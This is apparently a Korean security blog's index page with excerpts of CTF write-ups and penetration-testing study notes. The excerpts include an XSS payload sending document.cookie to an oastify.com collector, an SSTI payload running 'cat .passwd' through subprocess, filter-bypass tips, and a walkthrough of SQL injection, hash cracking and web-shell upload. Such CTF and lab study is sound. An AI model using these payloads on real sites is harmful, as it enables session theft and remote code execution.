본문 바로가기

전체 글

(169)
juniorcrypt2025-올만에 reversing 풀이 평일에 CTF에 참여했는데 웹문제가 없어서 리버싱이라도 풀었다.결과는 쉽게 나오기도 했고 llm성능이 굿(난이도가 올라감에 따라 바보가 될때가 있는데 바로 잡아주면 된다.)이라 올클Reverse/Hybrid Encryption import base64def decrypt_flag(): # 암호화된 base64 문자열 (원본 코드에서 정확히 복사) encrypted_base64 = "np2Z3p2c3s6YmZ3ezs2ZmM/Tnc7NmJmdz5yYm96cz8+Ym53Z3w==" # 1단계: base64 디코딩 decoded_bytes = base64.b64decode(encrypted_base64) print(f"Base64 디코딩 결과 (바이트): {list(decode..
IERAE CTF 2025-web-풀이 Warmdown![](x+"title\"onerror=\"fetch('http://havxgubljauhiefjnaf11gknhen5bxzm.oastify.com/steal?cookie='+document.cookie)\"")markdown을 이용한 xss요청 하면 해결(\"을 이용해서 우회, 마크다운상에선 \"로 처리되고 html상으론 "으로 처리)
smileyCTF-web-공부 dry-ice-n-co @PostMapping("/admin/add-product") public String addProduct(@RequestParam String name, @RequestParam int price, @RequestParam String description, HttpSession session) { User user = (User) session.getAttribute("user"); if ((user.admin = true) && user != null && name != "flag") { ..
smileyCTF-web-풀이 Sculpture Revengeimport documentoutput = document.getElementById("output")output.innerHTML = ''python을 js로 구현한 라이브러리를 이용해 xss유도( import document print dir(document))을 이용해 사용가능한 함수 확인 aW1wb3J0IGRvY3VtZW50CgpvdXRwdXQgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgib3V0cHV0IikKb3V0cHV0LmlubmVySFRNTCA9ICc8aW1nIHNyYz0ieCIgb25lcnJvcj0ibG9jYXRpb24uaHJlZj1cJ2h0dHA6Ly90a2h4Nzgxdm40bTA3ampka2N3cDIzd3NqanBhZDYxdi5vYXN..
N0PSctf-web-공부 Casin0ps닉네임과 이메일이 csv export시 그대로 엑셀에 담기기에 회원가입시 SSTI구문을 이용하면 rce가 가능하여 플래그 획득닉네임:test{{이메일:request.application.__globals__.__builtins__.__import__('subprocess').getoutput('cat .passwd')}}Press Me If U Can버튼누르면 플래그획득, 크롬 개발자도구 콘솔창을 이용해 해당 버튼을 disable되어있던걸 활성화해주고 클릭하면획득 XSS Lab1단계 기본적인 xss 2단계 문자열필터 img태그로 뚝딱 3단계 :// 차단 (일반 URL 차단)script 키워드 차단모든 on*= 이벤트 핸들러 차단이므로 //을 통해 자동으로 가게 해주고, script는 2단..
크롬 HSTS로 안들어가질때 chrome://net-internals/#hsts에 방문해서에 도메인만(https, 포트 등등 제외) 넣고 Delete를 해주면 페이지에서 새로고침시 고급버튼이 생기면서 접속이된다.
rev- llm 코드분석 시 프롬프트 You are an expert CTF player.Your task is to understand a function in a decompiled binary for a CTF challenge.The function consists of two steps:1. 8-bytes of user input are read into a buffer and treated as a 64-bit little-endian integer.2. This integer is manipulated in a series of arithmetic operations, to produce an XOR key.3. The XOR key is used to deobfuscate another part of memory.For now..
모의침투 공부 다음은 연습용 웹페이지에서 모의해킹 시나리오를 공부한 내용이다.먼저 웹페이지의 취약점을 찾아야하는데 다음처럼 union을 통한 sql injection 취약점이 있다.대학에서 모의해킹을 했을때는 여기서 취약점을 보고하고 끝이났지만 실무에선 더 깊게 나아간다. hashcat을 이용한 비밀번호 구하기hashcat -m 0 -a 0 hash값 rockyou.txt 비밀번호 구하기 성공(온라인의 HASH서비스를 이용할 경우 사용자의 개인정보를 웹에서 요청을 보낸 형태가 되기에 주의하자) 이제 구한 비밀번호로 관리자 로그인에 성공한 모습이후 관리자기능에서 사진파일 업로드 기능이 있는데 콘텐츠 타입 값을 변경해 웹쉘을 업로드한다. 인증 필요 ..